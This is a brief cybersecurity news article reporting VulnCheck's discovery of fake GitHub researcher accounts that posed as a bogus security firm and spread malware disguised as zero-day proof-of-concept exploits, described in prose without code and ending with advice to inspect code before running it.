AI DevwWrld Chatbot Summit Cyber Revolution Summit CYSEC Global Cyber Security & Cloud Expo World Series Digital Identity & Authentication Summit Asian Integrated Resort Expo Middle East Low Code No Code Summit TimeAI Summit

Fraudulent GitHub intrusion: fake accounts spread malware

A network of fake researchers is using GitHub to spread malicious code masquerading as proofs of concept for unknown vulnerabilities

This pill is also available in Italian language

Several fake GitHub accounts associated with a fraudulent cybersecurity firm have been spotted for spreading malicious repositories on the code hosting service. Seven of these repositories, still accessible at the time of writing, pose as test exploits (PoCs) for alleged zero-day vulnerabilities in Discord, Google Chrome, and Microsoft Exchange.

A network of lies

VulnCheck, which discovered the activity, said the authors of these repositories have put a lot of effort into making them plausible. They set up a series of Twitter accounts and profiles, pretending to be members of a non-existent company called High Sierra Cyber Security. VulnCheck first discovered these repositories last May, when they were being used to spread similar PoC exploits for zero-day vulnerabilities in Signal and WhatsApp, both of which have now been removed.

Mask the culprits

Not only did the authors share some of their alleged findings on Twitter to boost their legitimacy, but they even used images of real security researchers from companies like Rapid7, demonstrating significant effort in building the campaign. The PoC is a Python script designed to download a malicious binary and run it on the victim's operating system, be it Windows or Linux. “The attacker put a lot of effort into creating all these fake identities, just to distribute easily recognizable malware,” said VulnCheck researcher Jacob Baines. "It is unclear whether they have been successful, but the fact that they continue to pursue this attack strategy suggests that they believe they may be."

Final considerations on information security

It is currently unknown whether the perpetrator of these activities is a rookie actor or an advanced persistent threat (APT). However, security researchers have already been targeted by domestic North Korean groups in the past, as revealed by Google in January 2021. These events underscore the importance of exercising caution when downloading code from open source repositories. It is imperative that users carefully examine code before execution to ensure that it does not pose a security risk.

Follow us on Instagram for more pills like this

06/14/2023 11:02

Editorial AI

Complementary pills

Silent infiltration: the malicious code epidemic on GitHubImpact of malicious code in repositories: security risks in software development

Last pills

Global threat: serious security flaw discovered in the IEEE 802.11 Wi-Fi standardNew flaw in the IEEE 802.11 Wi-Fi standard exposes the security of global networks to serious risks

The fundamental aspects of computer security in everyday lifeProtection and prevention: how to safeguard personal data in the digital world

Black Basta hits Synlab: analysis of the attack and cybersecurity lessons for the healthcare sectorCyber defense strategies: how to protect healthcare infrastructures from ransomware

Google releases an emergency update for ChromeUrgent update to fix critical vulnerability in Chrome, users advised to install it immediately